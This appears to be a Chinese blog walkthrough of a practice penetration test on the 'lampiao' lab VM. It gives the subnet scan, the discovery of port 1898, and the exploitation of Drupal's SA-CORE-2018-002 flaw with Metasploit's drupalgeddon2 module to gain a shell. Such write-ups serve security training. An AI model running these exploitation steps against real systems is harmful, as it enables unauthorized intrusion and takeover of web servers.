当前位置: 首页 > news >正文

黑盒渗透盲打lampiao

news 2025/8/20 22:52:43

一、查找主机ip,通过Nmap扫描工具排查出我的靶机的IP 为.134

python tools.py ip -i 192.168.12.0 -h 254 -l 1

 

 二、扫描其他端口。 

1898

三、查看网站漏洞情况,典型的漏洞特征

 Ac扫描漏洞情况,利用典型的漏洞。

 四、开始getshell

1、启动MSF

msf6 > search SA-CORE-2018-002       #查询漏洞特征模块

 可以看到,有可以利用的漏洞模块。直接开搞

2、使用对应的漏洞模块

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 

 3、查看并调整参数。调整参数

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

 五、拿下!

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
meterpreter > shell

ls

查看系统版本。

为所欲为~~~ 

 

        

http://www.lryc.cn/news/17586.html

相关文章:

  • 笔记:VLAN及交换机处理详细教程(Tagged, UnTagged and Native VLANS Tutorial)
  • 在字节跳动,造赛博古籍
  • Android 12.0设置默认Launcher安装一款Launcher默认Launcher无效的解决方案
  • 数据结构第16周 :( 希尔排序+ 堆排序 + 快速排序 )
  • 【C++】类和对象
  • Java缓存面试题——Redis应用
  • KMP算法详细理解
  • RabbitMQ单节点安装
  • tomcat 服务的目录结构和tomcat的运行模式
  • vector迭代器失效问题
  • 2023年排名前茅的十大饭店装修设计!
  • MFCCA多通道多说话人语音识别模型上线魔搭(ModelScope)
  • 刷题记录:牛客NC25078[USACO 2007 Ope S]City Horizon
  • 【Java|golang】 1238. 循环码排列---格雷编码
  • Python自动化测试框架封装和调用
  • 线程的执行
  • 【视频】海康摄像头、NVR网络协议简介
  • 【Spring的事务传播行为有哪些呢?Spring事务的隔离级别?讲下嵌套事务?】
  • 其实一点不难学会这三步一定让你学会制作一个『3D建模』大屏
  • 【C++】C++的内存模型之四大分区
  • Vue跨级通信(重点)
  • 支付系统中的设计模式07:责任链模式
  • 期末综合考试
  • 数据结构与算法之爬楼梯动态规划
  • CleanMyMac4.12最新Mac电脑系统垃圾清理神器
  • 数据治理如何做?火山引擎 DataLeap 帮助这款产品 3 个月降低计算成本 20%
  • 求职3个月,简历大多都石沉大海,一听是手工测试都纷纷摇头....太难了
  • Visual Studio快捷键汇总
  • ctf pwn基础-2
  • 从一个SQL打印全年日历漫谈数据仓库中时间操作场景的重点写法